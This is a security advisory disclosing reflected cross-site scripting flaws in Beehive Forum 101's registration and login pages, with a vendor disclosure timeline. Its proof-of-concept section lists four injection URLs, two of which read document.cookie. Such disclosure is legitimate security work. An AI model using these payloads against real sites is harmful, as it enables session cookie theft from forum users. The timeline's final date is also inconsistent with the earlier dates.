Beehive Forum 101 Cross Site Scripting

2012.01.17

Credit: Stefan Schurtz

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Advisory:              	Beehive Forum 101 Multiple XSS vulnerabilities
Advisory ID:           	SSCHADV2011-042
Author:                	Stefan Schurtz
Affected Software:  	Successfully tested on Beehive Forum 101
Vendor URL:          	http://www.beehiveforum.co.uk/
Vendor Status:       	informed

==========================
Vulnerability Description
==========================

Beehive Forum 101 is prone to multiple XSS vulnerabilities

==================
PoC-Exploit
==================

// XSS
http://[target]/forum/register.php?'"</script><script>alert('XSS')</script>
http://[target]/forum/register.php/'"</script><script>alert(document.cookie)</script>
http://[target]/forum/logon.php?'"</script><script>alert('XSS')</script>
http://[target]/forum/logon.php/'"</script><script>alert(document.cookie)</script>

=========
Solution
=========

-

====================
Disclosure Timeline
====================

26-Dec-2011 - vendor informed
29-Dec-2011 - vendor feedback
15-Jan-2011 - no patch available

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/SSCHADV2011-042.txt

References:

http://www.beehiveforum.co.uk/

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Beehive Forum 101 Cross Site Scripting

References:

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Beehive Forum 101 Cross Site Scripting

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.